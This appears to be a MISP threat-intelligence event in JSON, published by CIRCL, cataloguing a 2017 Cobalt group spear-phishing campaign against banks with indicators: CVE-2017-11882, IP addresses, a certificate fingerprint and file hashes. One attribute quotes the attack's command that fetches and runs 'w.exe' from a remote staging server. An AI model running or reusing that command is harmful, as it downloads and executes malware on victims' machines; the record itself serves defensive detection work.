265 lines
No EOL
8.9 KiB
JSON
265 lines
No EOL
8.9 KiB
JSON
{
|
|
"Event": {
|
|
"analysis": "2",
|
|
"date": "2017-12-04",
|
|
"extends_uuid": "",
|
|
"info": "OSINT - Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions",
|
|
"publish_timestamp": "1514467711",
|
|
"published": true,
|
|
"threat_level_id": "3",
|
|
"timestamp": "1512442830",
|
|
"uuid": "5a25117c-6260-44a1-91b4-489d02de0b81",
|
|
"Orgc": {
|
|
"name": "CIRCL",
|
|
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
|
|
},
|
|
"Tag": [
|
|
{
|
|
"colour": "#0088cc",
|
|
"name": "misp-galaxy:threat-actor=\"Cobalt\""
|
|
},
|
|
{
|
|
"colour": "#ffffff",
|
|
"name": "tlp:white"
|
|
},
|
|
{
|
|
"colour": "#6edb00",
|
|
"name": "circl:topic=\"finance\""
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1512378829",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "5a25118a-c6f8-4fed-9728-45e002de0b81",
|
|
"value": "https://www.riskiq.com/blog/labs/cobalt-strike/",
|
|
"Tag": [
|
|
{
|
|
"colour": "#00223b",
|
|
"name": "osint:source-type=\"blog-post\""
|
|
},
|
|
{
|
|
"colour": "#007ed9",
|
|
"name": "osint:certainty=\"93\""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1512378829",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5a2511a6-d02c-4685-9c2f-458702de0b81",
|
|
"value": "In a recent spear-phishing campaign, the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike. However, they gave up much more information than they intended.\r\n\r\nOn Tuesday, November 21, a massive spear-phishing campaign began targeting individual employees at various financial institutions, mostly in Russia and Turkey. Purporting to provide info on changes to \u00e2\u20ac\u02dcSWIFT\u00e2\u20ac\u2122 terms, the email contained a single attachment with no text in the body.",
|
|
"Tag": [
|
|
{
|
|
"colour": "#00223b",
|
|
"name": "osint:source-type=\"blog-post\""
|
|
},
|
|
{
|
|
"colour": "#007ed9",
|
|
"name": "osint:certainty=\"93\""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1512380693",
|
|
"to_ids": false,
|
|
"type": "vulnerability",
|
|
"uuid": "5a251915-1914-4a0a-bf26-453102de0b81",
|
|
"value": "CVE-2017-11882"
|
|
},
|
|
{
|
|
"category": "Artifacts dropped",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1512380719",
|
|
"to_ids": true,
|
|
"type": "text",
|
|
"uuid": "5a25192f-78d8-43ac-a5e7-448402de0b81",
|
|
"value": "cmd /c start \\\\138.68.234.128\\w\\w.exe &AAAAAC"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "At RiskIQ, one of the datasets built from our large quantities of Internet data is a repository of SSL certificates and where we\u00e2\u20ac\u2122ve seen them. What\u00e2\u20ac\u2122s interesting about the case mentioned above is that the host is using a certificate seemingly shipped with Cobalt Strike by default. We can look up the certificate in RiskIQ Community via its SHA1 fingerprint",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1512380757",
|
|
"to_ids": true,
|
|
"type": "x509-fingerprint-sha1",
|
|
"uuid": "5a251955-b768-423a-9ce5-43dc02de0b81",
|
|
"value": "6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1512380798",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "5a25197e-d52c-4094-a610-4e3b02de0b81",
|
|
"value": "https://community.riskiq.com/projects/19bb67dd-2c51-7284-e5f2-7b79537e13d3"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Payload staging server",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1512380833",
|
|
"to_ids": true,
|
|
"type": "ip-dst",
|
|
"uuid": "5a2519a1-f3c4-4887-bb32-4b8102de0b81",
|
|
"value": "138.68.234.128"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Cobalt Strike server",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1512380833",
|
|
"to_ids": true,
|
|
"type": "ip-dst",
|
|
"uuid": "5a2519a1-34b0-4da9-b685-421e02de0b81",
|
|
"value": "104.144.207.207"
|
|
}
|
|
],
|
|
"Object": [
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "6",
|
|
"timestamp": "1512380890",
|
|
"uuid": "5a2519da-6f38-4196-a492-431202de0b81",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "text",
|
|
"timestamp": "1512380890",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5a2519da-713c-487e-9409-4c9f02de0b81",
|
|
"value": "CVE-2017-11882 exploit document downloading Cobalt Strike beacon"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "filename",
|
|
"timestamp": "1512380890",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "5a2519da-f360-49ce-ae02-4ac902de0b81",
|
|
"value": "Swift changes.rtf"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1512380890",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "5a2519da-a874-4de4-9030-481a02de0b81",
|
|
"value": "f360d41a0b42b129f7f0c29f98381416"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "state",
|
|
"timestamp": "1512380890",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5a2519da-6460-4c26-92fa-471202de0b81",
|
|
"value": "Malicious"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "6",
|
|
"timestamp": "1512380963",
|
|
"uuid": "5a251a0c-d1c4-43ca-b569-448202de0b81",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "text",
|
|
"timestamp": "1512380963",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5a251a0c-0f24-48b7-a276-48d702de0b81",
|
|
"value": "Cobalt Strike beacon"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "filename",
|
|
"timestamp": "1512380963",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "5a251a0c-fa00-40c4-a370-448e02de0b81",
|
|
"value": "w.exe"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1512380963",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "5a251a0c-dadc-4a74-8939-475802de0b81",
|
|
"value": "d46df9eacfe7ff75e098942e541d0f18"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "state",
|
|
"timestamp": "1512380963",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5a251a0c-e3d8-4b12-94d0-466702de0b81",
|
|
"value": "Malicious"
|
|
}
|
|
]
|
|
}
|
|
]
|
|
}
|
|
} |